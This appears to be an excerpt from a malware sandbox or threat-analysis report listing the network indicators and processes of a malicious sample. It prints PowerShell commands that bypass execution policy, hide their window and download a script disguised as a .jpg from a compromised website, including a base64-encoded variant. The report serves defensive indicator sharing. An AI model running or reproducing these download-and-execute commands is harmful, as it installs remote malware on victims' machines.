Technical Information
- https://the6hats.com/wp-content/themes/enfold/images/allghcw6cf3myvskurb.jpg as %windir%\tasks\x.ps1
- 'th###ats.com':443
- 'microsoft.com':80
- 'th###ats.com':443
- DNS ASK th###ats.com
- DNS ASK microsoft.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden powershell -command { IEX(New-Object Net.WebClient).DownloadFile('https://the6hats.com/wp-content/themes/enfold/images/AllGHCw6cF3MYVSkUrB.jpg', '%WI...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -encodedCommand IABJAEUAWAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHQAaABlADYAaABhAHQAcwAuAGMAbwBtAC8Ad...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command %WINDIR%\Tasks\x.ps1